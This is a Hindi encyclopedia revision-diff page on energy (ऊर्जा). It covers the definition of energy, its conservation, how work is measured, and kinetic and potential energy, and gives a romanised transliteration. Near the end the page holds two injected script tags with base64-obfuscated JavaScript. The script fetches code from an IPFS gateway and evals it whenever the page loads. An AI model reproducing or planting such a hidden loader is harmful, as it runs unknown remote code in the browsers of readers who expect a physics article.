Difference between revisions of "ऊर्जा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Energy) किसी वस्तु में कार्य करने की क्षमता को उस वस्तु की '''ऊर्जा''' कहते हैं। ऊर्जा एक अदिश राशि है। वस्तु में जिस कारण से कार्य करने की क्षमता आ जाती है, उसे ऊर्जा कहते हैं। ऊर्जा दो प्रकार की होती है- [[गतिज ऊर्जा]] एवं [[स्थितिज ऊर्जा]]।
+
'''ऊर्जा''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Energy) से तात्पर्य है कि- "किसी वस्तु में कार्य करने की जो क्षमता होती है, उसे वस्तु की 'ऊर्जा' कहते हैं। ऊर्जा एक अदिश राशि है। वस्तु में जिस कारण से कार्य करने की क्षमता आ जाती है, उसे ही ऊर्जा कहा जाता है। ऊर्जा सामाजिक और आर्थिक विकास के लिए तथा किसी भी देश में मानव जीवन की गुणवत्ता में सुधार लाने के लिए अत्यंत महत्त्वपूर्ण है। किसी भी देश की सम्पन्नता इस बात पर भी निर्भर करती है कि उस देश में ऊर्जा के स्रोत क्या-क्या हैं और उनका कितना उपयोग हो रहा है।
 +
==कार्य एवं ऊर्जा==
  
{{प्रचार}}
+
कई प्रकार के उपायों द्वारा ऊर्जा को एक रूप से दूसरे रूप में बदला जा सकता है। इन परिवर्तनों में ऊर्जा की मात्रा सर्वदा एक ही रहती है। उसमें कमी नहीं होती। इसे ऊर्जा का अविनाशिता का सिद्धांत कहा जाता है। जैसा कि कहा गया है कि- "कार्य कर सकने की क्षमता को ऊर्जा कहते हैं", परंतु सारी ऊर्जा को कार्य में परिणत करना संभव नहीं होता। इसलिए यह कहना अधिक उपयुक्त होगा कि "ऊर्जा वह है, जो उतनी ही घटती है, जितना कि कार्य किया जाता है।" इस कारण ऊर्जा को नापने के वे ही एकक होते हैं, जो कार्य को नापने के होते हैं। यदि एक किलोग्राम भार को एक मीटर ऊँचा उठाया जाता है तो [[पृथ्वी]] के गुरुत्वाकर्षण के विरुद्ध एक विशेष मात्रा में कार्य करना पड़ता है। यदि इसी भार को दो मीटर ऊँचा उठाया जाये अथवा दो किलोग्राम भार को एक मीटर ऊँचा उठाएँ तो दोनों दशाओं में पहले की अपेक्षा दुगुना कार्य करना पड़ता है। इससे प्रकट होता है कि कार्य का परिमाण उस बल के परिमाण पर, जिसके विरुद्ध कार्य किया जाए और उस दूरी के परिमाण पर, जिस दूरी द्वारा उस बल के विरुद्ध कार्य किया जाए, निर्भर रहता है और इन दोनों परिमाणों के गुणनफल के बराबर होता है।
{{लेख प्रगति
+
====प्रकार====
|आधार=
+
ऊर्जा दो प्रकार की होती है-
|प्रारम्भिक=प्रारम्भिक1
+
#[[गतिज ऊर्जा]]
|माध्यमिक=
+
#[[स्थितिज ऊर्जा]]।
|पूर्णता=
+
 
|शोध=
+
 
}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:भौतिक विज्ञान]]
+
==संबंधित लेख==
[[Category:विज्ञान कोश]]
+
[[Category:भौतिक विज्ञान]][[Category:विज्ञान कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 11:42, 19 August 2013

oorja (aangrezi:Energy) se tatpary hai ki- "kisi vastu mean kary karane ki jo kshamata hoti hai, use vastu ki 'oorja' kahate haian. oorja ek adish rashi hai. vastu mean jis karan se kary karane ki kshamata a jati hai, use hi oorja kaha jata hai. oorja samajik aur arthik vikas ke lie tatha kisi bhi desh mean manav jivan ki gunavatta mean sudhar lane ke lie atyant mahattvapoorn hai. kisi bhi desh ki sampannata is bat par bhi nirbhar karati hai ki us desh mean oorja ke srot kya-kya haian aur unaka kitana upayog ho raha hai.

kary evan oorja

kee prakar ke upayoan dvara oorja ko ek roop se doosare roop mean badala ja sakata hai. in parivartanoan mean oorja ki matra sarvada ek hi rahati hai. usamean kami nahian hoti. ise oorja ka avinashita ka siddhaant kaha jata hai. jaisa ki kaha gaya hai ki- "kary kar sakane ki kshamata ko oorja kahate haian", parantu sari oorja ko kary mean parinat karana sanbhav nahian hota. isalie yah kahana adhik upayukt hoga ki "oorja vah hai, jo utani hi ghatati hai, jitana ki kary kiya jata hai." is karan oorja ko napane ke ve hi ekak hote haian, jo kary ko napane ke hote haian. yadi ek kilogram bhar ko ek mitar ooancha uthaya jata hai to prithvi ke gurutvakarshan ke viruddh ek vishesh matra mean kary karana p data hai. yadi isi bhar ko do mitar ooancha uthaya jaye athava do kilogram bhar ko ek mitar ooancha uthaean to donoan dashaoan mean pahale ki apeksha duguna kary karana p data hai. isase prakat hota hai ki kary ka pariman us bal ke pariman par, jisake viruddh kary kiya jae aur us doori ke pariman par, jis doori dvara us bal ke viruddh kary kiya jae, nirbhar rahata hai aur in donoan parimanoan ke gunanaphal ke barabar hota hai.

prakar

oorja do prakar ki hoti hai-

  1. gatij oorja
  2. sthitij oorja.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh